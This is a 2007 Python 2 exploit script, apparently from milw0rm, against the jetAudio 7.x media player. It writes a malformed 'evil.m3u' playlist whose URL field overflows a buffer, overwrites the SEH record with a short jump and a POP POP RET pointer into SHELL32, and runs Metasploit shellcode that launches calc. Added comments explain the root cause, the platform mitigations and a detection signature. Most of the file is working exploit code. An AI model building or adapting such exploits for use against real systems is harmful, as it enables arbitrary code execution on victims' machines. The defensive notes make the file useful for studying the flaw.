
jetAudio 7.x m3u File Local SEH Overwrite Exploit


#!/usr/bin/python
# jetAudio 7.x (m3u File) 0day Local SEH Overwrite Exploit
# Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl>
# Tested on: jetAudio 7.0.3 Basic / 2k SP4 Polish
# Shellcode: Windows Execute Command (calc) <metasploit.com>
# Just for fun ;)
##
#
# What this script does: it builds a one-entry .m3u playlist whose URL field
# is an over-long string and writes it to "evil.m3u" in the current
# directory, then prints "DONE".  Nothing is executed here; the crash and
# control-flow hijack only happen when the affected jetAudio build parses
# the file.
#
# Python 2 script: `print` is a statement and string literals are byte
# strings, so it does not run unmodified on Python 3.
#
# Defender's notes:
#   - Root cause is in the playlist parser, not in this file: presumably an
#     unbounded copy of the URL field into a fixed-size stack buffer (not
#     visible here - confirm against the product).  Length validation of
#     playlist entries is the actual fix.
#   - The handler value below is a hard-coded pointer into SHELL32.DLL for
#     one OS / service pack / locale.  SafeSEH, SEHOP, DEP and ASLR are the
#     platform mitigations that defeat SEH-overwrite exploits of this kind,
#     which is why the sample is pinned to a Windows 2000 SP4 build.
#   - File-based detection: an m3u entry of well over 1 KB consisting of a
#     long run of spaces followed by non-printable bytes is a strong
#     indicator for this class of malformed playlist.

from struct import pack

# Minimal playlist: the #EXTM3U header line, then a single URL entry whose
# body (%s) is replaced with the payload below.
m3u = ("#EXTM3U\nhttp://%s")

# Position-independent payload taken verbatim from Metasploit (per the
# header: Windows "Execute Command", launching calc).  Not decoded here.
shellcode = (
"\x6a\x22\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x8d\x6c\xf6"
"\xb2\x83\xeb\xfc\xe2\xf4\x71\x84\xb2\xb2\x8d\x6c\x7d\xf7\xb1\xe7"
"\x8a\xb7\xf5\x6d\x19\x39\xc2\x74\x7d\xed\xad\x6d\x1d\xfb\x06\x58"
"\x7d\xb3\x63\x5d\x36\x2b\x21\xe8\x36\xc6\x8a\xad\x3c\xbf\x8c\xae"
"\x1d\x46\xb6\x38\xd2\xb6\xf8\x89\x7d\xed\xa9\x6d\x1d\xd4\x06\x60"
"\xbd\x39\xd2\x70\xf7\x59\x06\x70\x7d\xb3\x66\xe5\xaa\x96\x89\xaf"
"\xc7\x72\xe9\xe7\xb6\x82\x08\xac\x8e\xbe\x06\x2c\xfa\x39\xfd\x70"
"\x5b\x39\xe5\x64\x1d\xbb\x06\xec\x46\xb2\x8d\x6c\x7d\xda\xb1\x33"
"\xc7\x44\xed\x3a\x7f\x4a\x0e\xac\x8d\xe2\xe5\x9c\x7c\xb6\xd2\x04"
"\x6e\x4c\x07\x62\xa1\x4d\x6a\x0f\x97\xde\xee\x6c\xf6\xb2")

# The two dwords that overwrite the SEH record (next-record pointer, then
# handler pointer).  Both are packed little-endian below.
NEXT_SEH_RECORD = 0x909006EB            # JMP SHORT + 0x06
SE_HANDLER = 0x7CEA61F7                 # POP POP RET (SHELL32.DLL / 2k SP4 Polish)

# Payload assembled in order: 8-byte marker, 1009 spaces of padding, the
# two packed pointers, a 128-byte NOP sled, then the shellcode.  The padding
# length is what positions the pointers over the SEH record for the tested
# build; any other build/locale will simply crash (or nothing happens).
buf   = "CLICK ME"
buf   += "\x20" * 1009
buf   += pack("<L", NEXT_SEH_RECORD)
buf   += pack("<L", SE_HANDLER)
buf   += "\x90" * 128
buf   += shellcode

# Substitute the payload into the URL slot of the playlist template.
m3u %= buf

# Write the playlist to disk (relative path, text mode).  Handle is closed
# explicitly rather than via `with` - typical of the Python 2-era style.
fd = open("evil.m3u", "w")
fd.write(m3u)
fd.close()

print "DONE"

# EoF

# milw0rm.com [2007-10-14]




h07                                                                                          10/14/2007

								